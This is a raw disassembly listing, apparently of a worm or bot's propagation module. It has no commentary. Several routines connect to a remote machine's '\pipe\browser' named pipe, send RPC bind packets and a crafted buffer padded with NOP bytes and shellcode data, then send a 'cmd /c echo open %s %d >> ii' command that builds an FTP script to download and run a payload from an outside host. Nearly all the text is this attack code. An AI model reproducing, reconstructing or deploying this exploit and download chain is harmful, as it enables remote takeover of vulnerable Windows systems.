loc_404560: ; CODE XREF: sub_404514+2C�j
test esi, esi
jbe short loc_4045A3
cmp esi, eax
jnz short loc_4045A3
mov eax, [ebx+4]
test eax, eax
jnz short loc_404574
mov eax, offset dword_424290
loc_404574: ; CODE XREF: sub_404514+59�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_4045A3
push 1
mov ecx, edi
call sub_404667
mov eax, [ebx+4]
test eax, eax
jnz short loc_40458F
mov eax, offset dword_424290
loc_40458F: ; CODE XREF: sub_404514+74�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_4045D9
; ---------------------------------------------------------------------------
loc_4045A3: ; CODE XREF: sub_404514+4E�j
; sub_404514+52�j ...
push 1
push esi
mov ecx, edi
call sub_4045E2
test al, al
jz short loc_4045D9
mov eax, [ebx+4]
test eax, eax
jnz short loc_4045BD
mov eax, offset dword_424290
loc_4045BD: ; CODE XREF: sub_404514+A2�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_417390
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [eax+esi], 0
loc_4045D9: ; CODE XREF: sub_404514+4A�j
; sub_404514+8D�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_404514 endp
; =============== S U B R O U T I N E =======================================
sub_4045E2 proc near ; CODE XREF: sub_404032+3D�p
; sub_404464+28�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_4045F4
call sub_42298A
loc_4045F4: ; CODE XREF: sub_4045E2+B�j
mov ecx, [esi+4]
xor edx, edx
cmp ecx, edx
jz short loc_40461D
mov al, [ecx-1]
cmp al, dl
jz short loc_40461D
cmp al, 0FFh
jz short loc_40461D
cmp edi, edx
jnz short loc_404658
dec al
push edx
mov [ecx-1], al
loc_404612: ; CODE XREF: sub_4045E2+47�j
mov ecx, esi
call sub_404667
loc_404619: ; CODE XREF: sub_4045E2+4B�j
; sub_4045E2+52�j
xor al, al
jmp short loc_404662
; ---------------------------------------------------------------------------
loc_40461D: ; CODE XREF: sub_4045E2+19�j
; sub_4045E2+20�j ...
cmp edi, edx
jnz short loc_404636
cmp [esp+8+arg_4], dl
jz short loc_40462B
push 1
jmp short loc_404612
; ---------------------------------------------------------------------------
loc_40462B: ; CODE XREF: sub_4045E2+43�j
cmp ecx, edx
jz short loc_404619
mov [esi+8], edx
mov [ecx], dl
jmp short loc_404619
; ---------------------------------------------------------------------------
loc_404636: ; CODE XREF: sub_4045E2+3D�j
cmp [esp+8+arg_4], dl
jz short loc_404653
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_404648
cmp eax, edi
jnb short loc_404660
loc_404648: ; CODE XREF: sub_4045E2+60�j
push 1
mov ecx, esi
call sub_404667
jmp short loc_404658
; ---------------------------------------------------------------------------
loc_404653: ; CODE XREF: sub_4045E2+58�j
cmp [esi+0Ch], edi
jnb short loc_404660
loc_404658: ; CODE XREF: sub_4045E2+28�j
; sub_4045E2+6F�j
push edi
mov ecx, esi
call sub_40473F
loc_404660: ; CODE XREF: sub_4045E2+64�j
; sub_4045E2+74�j
mov al, 1
loc_404662: ; CODE XREF: sub_4045E2+39�j
pop edi
pop esi
retn 8
sub_4045E2 endp
; =============== S U B R O U T I N E =======================================
sub_404667 proc near ; CODE XREF: sub_404032+1F�p
; sub_404032+16A�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_404693
mov eax, [esi+4]
test eax, eax
jz short loc_404693
lea ecx, [eax-1]
mov al, [eax-1]
test al, al
jz short loc_40468C
cmp al, 0FFh
jz short loc_40468C
dec al
mov [ecx], al
jmp short loc_404693
; ---------------------------------------------------------------------------
loc_40468C: ; CODE XREF: sub_404667+19�j
; sub_404667+1D�j
push ecx
call sub_4182AF
pop ecx
loc_404693: ; CODE XREF: sub_404667+8�j
; sub_404667+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_404667 endp
; =============== S U B R O U T I N E =======================================
sub_4046A3 proc near ; CODE XREF: _0:004043C3�p
; sub_4047FC+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
mov esi, ecx
push edi
call sub_4045E2
test al, al
jz short loc_4046D1
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_417390
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_4046D1: ; CODE XREF: sub_4046A3+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_4046A3 endp
; =============== S U B R O U T I N E =======================================
sub_4046D8 proc near ; CODE XREF: sub_404514+39�p
; sub_404514+45�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_4046EB
call sub_422863
loc_4046EB: ; CODE XREF: sub_4046D8+C�j
mov ecx, edi
call sub_4047FC
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_404701
mov ebx, eax
loc_404701: ; CODE XREF: sub_4046D8+25�j
test ebx, ebx
jbe short loc_404737
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_4182C0
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_4045E2
test al, al
jz short loc_404737
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_404737: ; CODE XREF: sub_4046D8+2B�j
; sub_4046D8+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_4046D8 endp
; =============== S U B R O U T I N E =======================================
sub_40473F proc near ; CODE XREF: sub_4045E2+79�p
mov eax, offset loc_423110
call sub_418290
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_404765
mov edi, [ebp+8]
loc_404765: ; CODE XREF: sub_40473F+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_404772
xor eax, eax
loc_404772: ; CODE XREF: sub_40473F+2F�j
push eax
call sub_4185F5
pop ecx
mov [ebp+8], eax
jmp short loc_4047A3
; ---------------------------------------------------------------------------
loc_40477E: ; DATA XREF: _1:00424F9C�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_40478D
xor eax, eax
loc_40478D: ; CODE XREF: sub_40473F+4A�j
push eax
call sub_4185F5
mov [ebp+8], eax
pop ecx
mov eax, offset loc_40479D
retn
; ---------------------------------------------------------------------------
loc_40479D: ; DATA XREF: sub_40473F+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_4047A3: ; CODE XREF: sub_40473F+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_4047C1
cmp eax, edi
jbe short loc_4047B0
mov eax, edi
loc_4047B0: ; CODE XREF: sub_40473F+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_417390
add esp, 0Ch
loc_4047C1: ; CODE XREF: sub_40473F+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_404667
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_4047E1
mov edi, ebx
loc_4047E1: ; CODE XREF: sub_40473F+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [eax+edi], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40473F endp
; =============== S U B R O U T I N E =======================================
sub_4047FC proc near ; CODE XREF: sub_4046D8+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_404829
mov al, [esi-1]
test al, al
jz short loc_404829
cmp al, 0FFh
jz short loc_404829
push 1
call sub_404667
push esi
call sub_417AB0
pop ecx
push eax
push esi
mov ecx, edi
call sub_4046A3
loc_404829: ; CODE XREF: sub_4047FC+9�j
; sub_4047FC+10�j ...
pop edi
pop esi
retn
sub_4047FC endp
; =============== S U B R O U T I N E =======================================
sub_40482C proc near ; DATA XREF: _2:00426008�o
test ds:byte_48A30C, 1
jnz short loc_40483C
or ds:byte_48A30C, 1
loc_40483C: ; CODE XREF: sub_40482C+7�j
jmp $+5
push offset nullsub_2
call sub_418670
pop ecx
retn
sub_40482C endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40484E proc near ; DATA XREF: _2:0042600C�o
jmp $+5
sub_40484E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404853 proc near
mov eax, ds:dword_428BE0
add eax, 6
mov ds:dword_43C828, eax
retn
sub_404853 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404861 proc near ; CODE XREF: sub_404861+D0�p
; sub_40494F+471�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_404875
or [ebp+arg_7], 1
jmp short loc_404879
; ---------------------------------------------------------------------------
loc_404875: ; CODE XREF: sub_404861+C�j
and [ebp+arg_7], 0FEh
loc_404879: ; CODE XREF: sub_404861+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+arg_20]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_40489D
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_4048AF
; ---------------------------------------------------------------------------
loc_40489D: ; CODE XREF: sub_404861+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_4048AF: ; CODE XREF: sub_404861+3A�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_417B89
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_404948
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:dword_42407C ; WriteFile
test eax, eax
jz short loc_40493F
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_40493F
push [ebp+arg_20]
call sub_417C3B
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_40493B
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_404861
add esp, 2Ch
jmp short loc_40494A
; ---------------------------------------------------------------------------
loc_40493B: ; CODE XREF: sub_404861+B3�j
mov al, 1
jmp short loc_40494A
; ---------------------------------------------------------------------------
loc_40493F: ; CODE XREF: sub_404861+9C�j
; sub_404861+A4�j
push [ebp+arg_20]
call sub_417C3B
pop ecx
loc_404948: ; CODE XREF: sub_404861+61�j
xor al, al
loc_40494A: ; CODE XREF: sub_404861+D8�j
; sub_404861+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_404861 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40494F proc near ; CODE XREF: _0:00404F4D�p
var_60DC = byte ptr -60DCh
var_40DC = byte ptr -40DCh
var_20DC = byte ptr -20DCh
var_DC = byte ptr -0DCh
var_C8 = dword ptr -0C8h
var_BC = byte ptr -0BCh
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_B6 = byte ptr -0B6h
var_B5 = byte ptr -0B5h
var_B4 = dword ptr -0B4h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = dword ptr -0ACh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = word ptr -9Ch
var_9A = byte ptr -9Ah
var_98 = byte ptr -98h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_5C = byte ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = qword ptr -28h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = qword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 60DCh
call sub_417B30
push ebx
push esi
push edi
push offset a_ ; "."
push [ebp+arg_0]
call sub_418790
pop ecx
xor ebx, ebx
test eax, eax
pop ecx
jz short loc_4049C2
push [ebp+arg_0]
mov esi, 2000h
lea eax, [ebp+var_20DC]
push offset loc_428628
push esi
push eax
call sub_41782A
push 20h
lea eax, [ebp+var_DC]
push ebx
push eax
call sub_417330
lea eax, [ebp+var_20DC]
add esp, 1Ch
mov [ebp+var_C8], eax
mov eax, offset byte_43C80C
push ebx
push eax
push eax
lea eax, [ebp+var_DC]
push eax
call sub_422A40
jmp short loc_4049C7
; ---------------------------------------------------------------------------
loc_4049C2: ; CODE XREF: sub_40494F+23�j
mov esi, 2000h
loc_4049C7: ; CODE XREF: sub_40494F+71�j
push [ebp+arg_0]
lea eax, [ebp+var_40DC]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call ds:off_424084
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_404A0B
loc_404A04: ; CODE XREF: sub_40494F+194�j
; sub_40494F+36A�j ...
xor al, al
jmp loc_404E4F
; ---------------------------------------------------------------------------
loc_404A0B: ; CODE XREF: sub_40494F+B3�j
push 48h
lea eax, [ebp+var_B8]
push ebx
push eax
call sub_417330
push 10h
mov [ebp+var_B8], 5
pop eax
mov [ebp+var_B7], bl
push 1
mov [ebp+var_B4], eax
pop edi
mov [ebp+var_B6], 0Bh
push eax
lea eax, [ebp+var_98]
push offset dword_428C34
push eax
mov [ebp+var_B5], 3
mov [ebp+var_B0], 48h
mov [ebp+var_AE], bx
mov [ebp+var_AC], ebx
mov [ebp+var_A8], 10B8h
mov [ebp+var_A6], 10B8h
mov [ebp+var_A4], ebx
mov [ebp+var_A0], edi
mov [ebp+var_9C], bx
mov [ebp+var_9A], 1
call sub_417390
push 10h
lea eax, [ebp+var_84]
push offset dword_428C20
push eax
mov [ebp+var_88], 3
call sub_417390
add esp, 24h
lea eax, [ebp+var_BC]
mov [ebp+var_74], 2
push ebx
push eax
lea eax, [ebp+var_B8]
push 48h
push eax
push [ebp+var_4]
call ds:dword_42407C ; WriteFile
test eax, eax
jnz short loc_404AE8
loc_404ADA: ; CODE XREF: sub_40494F+265�j
push [ebp+var_4]
call ds:off_424078
jmp loc_404A04
; ---------------------------------------------------------------------------
loc_404AE8: ; CODE XREF: sub_40494F+189�j
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_60DC]
push esi
push eax
push [ebp+var_4]
call ds:off_424074
push ebx
call sub_4186B1
push eax
call sub_417300
push 14h
lea eax, [ebp+var_70]
push 41h
push eax
call sub_417330
push 1Ch
lea eax, [ebp+var_30]
push 41h
push eax
call sub_417330
add esp, 20h
call sub_41730A
mov esi, [ebp+arg_4]
mov [ebp+var_70], eax
mov [ebp+var_64], edi
mov [ebp+var_68], ebx
lea esi, [esi+esi*4]
mov [ebp+var_6C], edi
shl esi, 2
mov [ebp+var_60], bx
cmp ds:byte_428BC8[esi], bl
jz short loc_404B5F
push 4
mov dword ptr [ebp+var_28+4], edi
mov dword ptr [ebp+var_28], ebx
mov [ebp+var_2C], edi
push offset dword_43C830
jmp short loc_404B72
; ---------------------------------------------------------------------------
loc_404B5F: ; CODE XREF: sub_40494F+1FC�j
push 2
mov dword ptr [ebp+var_28], ebx
pop eax
push 4
mov dword ptr [ebp+var_28+4], eax
mov [ebp+var_2C], eax
push (offset loc_428C17+1)
loc_404B72: ; CODE XREF: sub_40494F+20E�j
lea eax, [ebp+var_20]
push eax
call sub_417390
add esp, 0Ch
call sub_41730A
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_30], edx
call sub_41730A
cdq
idiv edi
mov eax, ds:dword_428BBC[esi]
mov [ebp+var_18], ebx
push eax
mov [ebp+arg_0], eax
inc edx
mov [ebp+var_1C], edx
call sub_417B89
mov edi, eax
pop ecx
cmp edi, ebx
jz loc_404ADA
mov eax, [ebp+arg_0]
add eax, 0FFFFFFFEh
push eax
push 90h
push edi
call sub_417330
mov eax, [ebp+arg_0]
push 2
push ebx
lea eax, [edi+eax-2]
push eax
call sub_417330
mov eax, ds:dword_428BC4[esi]
push 7
add eax, edi
push offset dword_428BB0
push eax
mov [ebp+arg_4], eax
call sub_417390
mov eax, [ebp+arg_4]
push 15Ch
add eax, 7
push offset dword_428A50
push eax
call sub_417390
mov eax, ds:dword_428BC0[esi]
add esp, 30h
cmp ds:byte_428BC8[esi], bl
mov [ebp+arg_4], eax
jz short loc_404C6B
push 4
add eax, edi
push offset dword_43C828
push eax
call sub_417390
add [ebp+arg_4], 0Ch
mov esi, offset dword_428BE0
mov eax, [ebp+arg_4]
push 4
add eax, edi
push esi
push eax
call sub_417390
mov eax, [ebp+arg_4]
push 4
push esi
lea eax, [eax+edi+24h]
push eax
mov [ebp+arg_4], eax
call sub_417390
mov eax, [ebp+arg_4]
push 4
add eax, 0Ch
push esi
push eax
call sub_417390
add esp, 30h
jmp short loc_404C93
; ---------------------------------------------------------------------------
loc_404C6B: ; CODE XREF: sub_40494F+2CD�j
add eax, edi
mov [ebp+var_8], 10h
mov [ebp+arg_4], eax
mov esi, offset dword_428BE0
loc_404C7C: ; CODE XREF: sub_40494F+342�j
push 4
push esi
push [ebp+arg_4]
call sub_417390
add [ebp+arg_4], 4
add esp, 0Ch
dec [ebp+var_8]
jnz short loc_404C7C
loc_404C93: ; CODE XREF: sub_40494F+31A�j
mov eax, [ebp+arg_0]
add eax, 42h
push eax
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_404CBE
push [ebp+var_4]
call ds:off_424078
push edi
call sub_417C3B
pop ecx
jmp loc_404A04
; ---------------------------------------------------------------------------
loc_404CBE: ; CODE XREF: sub_40494F+358�j
mov eax, [ebp+arg_0]
add eax, 42h
push eax
push ebx ; double
push esi
call sub_417330
lea eax, [ebp+var_70]
push 14h
push eax
push esi
call sub_417390
mov eax, [ebp+arg_0]
mov [ebp-0Ch], ebx
mov dword ptr [ebp+var_14+4], eax
add esp, 10h
fild [ebp+var_14+4]
fmul ds:flt_424294
fstp [esp+14h+var_14]
call sub_417DEB
call sub_417DC4
push [ebp+arg_0]
mov [esi+1Ch], eax
mov [esi+18h], ebx
mov eax, [esi+1Ch]
mov [esi+14h], eax
lea eax, [esi+20h]
push edi
push eax
call sub_417390
mov eax, [ebp+arg_0]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp+arg_4], eax
jz short loc_404D2B
loc_404D23: ; CODE XREF: sub_40494F+3D7�j
inc eax
test al, 3
jnz short loc_404D23
mov [ebp+arg_4], eax
loc_404D2B: ; CODE XREF: sub_40494F+3D2�j
lea ecx, [ebp+var_30]
push 1Ch
add eax, esi
push ecx
push eax
call sub_417390
add [ebp+arg_4], 1Ch
push edi
call sub_417C3B
push 18h
lea eax, [ebp+var_48]
push ebx
push eax
call sub_417330
push 14h
lea eax, [ebp+var_5C]
push ebx
push eax
mov [ebp+var_48], 5
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], 3
mov [ebp+var_44], 10h
mov [ebp+var_3E], bx
mov [ebp+var_3C], ebx
mov [ebp+var_34], bx
mov [ebp+var_32], 1Fh
call sub_417330
add esp, 28h
push ebx
push ebx
push 1
push ebx
call ds:dword_424090 ; CreateEventA
mov [ebp+var_4C], eax
mov byte ptr [ebp+arg_0+3], bl
mov [ebp-0Ch], ebx
loc_404D98: ; CODE XREF: sub_40494F+4D3�j
cmp dword ptr [ebp-0Ch], 2
jge loc_404E2D
push 1
push 10B8h
push [ebp+arg_4]
inc dword ptr [ebp-0Ch]
push esi
lea esi, [ebp+var_48]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+var_4]
rep movsd
call sub_404861
add esp, 2Ch
test al, al
jz short loc_404E2A
cmp [ebp+var_4C], ebx
jz short loc_404E1C
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_60DC]
push 2000h
push eax
push [ebp+var_4]
call ds:off_424074
test eax, eax
jnz short loc_404E03
call ds:dword_42408C ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz loc_404A04
loc_404E03: ; CODE XREF: sub_40494F+4A1�j
push 3E8h
push [ebp+var_4C]
call ds:dword_424088 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_404E1C
mov byte ptr [ebp+arg_0+3], 1
loc_404E1C: ; CODE XREF: sub_40494F+480�j
; sub_40494F+4C7�j
cmp byte ptr [ebp+arg_0+3], bl
mov esi, [ebp+var_8]
jz loc_404D98
jmp short loc_404E2D
; ---------------------------------------------------------------------------
loc_404E2A: ; CODE XREF: sub_40494F+47B�j
mov esi, [ebp+var_8]
loc_404E2D: ; CODE XREF: sub_40494F+44D�j
; sub_40494F+4D9�j
push [ebp+var_4]
mov edi, ds:off_424078
call edi ; sub_49C3D5
push esi
call sub_417C3B
cmp [ebp+var_4C], ebx
pop ecx
jz short loc_404E49
push [ebp+var_4C]
call edi ; sub_49C3D5
loc_404E49: ; CODE XREF: sub_40494F+4F3�j
cmp byte ptr [ebp+arg_0+3], bl
setnz al
loc_404E4F: ; CODE XREF: sub_40494F+B7�j
pop edi
pop esi
pop ebx
leave
retn
sub_40494F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E54 proc near ; CODE XREF: _0:00404F6B�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_4241FC ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_424224 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_424214 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_404F22
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_42421C ; connect
cmp eax, 0FFFFFFFFh
jz short loc_404F22
mov edi, 400h
push esi
mov esi, ds:dword_424204
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset byte_42F678
push eax
push eax
push ds:dword_43C83C
push [ebp+arg_0]
call sub_40AEE0
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_41782A
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_424208 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_404F26
loc_404F22: ; CODE XREF: sub_404E54+50�j
; sub_404E54+62�j
xor eax, eax
jmp short loc_404F3D
; ---------------------------------------------------------------------------
loc_404F26: ; CODE XREF: sub_404E54+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_424220 ; closesocket
push 1
pop eax
loc_404F3D: ; CODE XREF: sub_404E54+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_404E54 endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
xor ebx, ebx
loc_404F47: ; CODE XREF: _0:00404F8D�j
lea eax, [esp+14h]
push ebx
push eax
call sub_40494F
pop ecx
test al, al
pop ecx
jz short loc_404F7A
push 65h
lea esi, [esp+14h]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_404E54
add esp, 0C0h
test eax, eax
jnz short loc_404F95
loc_404F7A: ; CODE XREF: _0:00404F56�j
test ebx, ebx
jnz short loc_404F89
push 7D0h
call ds:dword_424064 ; Sleep
loc_404F89: ; CODE XREF: _0:00404F7C�j
inc ebx
cmp ebx, 2
jb short loc_404F47
xor eax, eax
loc_404F91: ; CODE XREF: _0:00404F98�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404F95: ; CODE XREF: _0:00404F78�j
push 1
pop eax
jmp short loc_404F91
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F9A proc near ; CODE XREF: _0:00405119�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_4241FC ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_424224 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_424214 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_405068
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_42421C ; connect
cmp eax, 0FFFFFFFFh
jz short loc_405068
mov edi, 400h
push esi
mov esi, ds:dword_424204
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset byte_42F678
push eax
push eax
push ds:dword_43C83C
push [ebp+arg_0]
call sub_40AEE0
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_41782A
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_424208 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40506C
loc_405068: ; CODE XREF: sub_404F9A+50�j
; sub_404F9A+62�j
xor eax, eax
jmp short loc_405083
; ---------------------------------------------------------------------------
loc_40506C: ; CODE XREF: sub_404F9A+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_424220 ; closesocket
push 1
pop eax
loc_405083: ; CODE XREF: sub_404F9A+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_404F9A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+0Ch]
push edi
push eax
mov word ptr [ebp-10h], 2
call ds:dword_43F6A8 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call ds:dword_43F668 ; htons
push 6
push 1
push 2
mov [ebp-0Eh], ax
call ds:dword_424214 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4050FA
lea eax, [ebp-10h]
push 10h
push eax
push esi
call ds:dword_42421C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4050DB
push esi
jmp short loc_4050F4
; ---------------------------------------------------------------------------
loc_4050DB: ; CODE XREF: _0:004050D6�j
push 0
push 1213h
push offset dword_428C60
push esi
call ds:dword_424208 ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_4050FE
loc_4050F4: ; CODE XREF: _0:004050D9�j
call ds:dword_424220 ; closesocket
loc_4050FA: ; CODE XREF: _0:004050C4�j
xor eax, eax
jmp short loc_405140
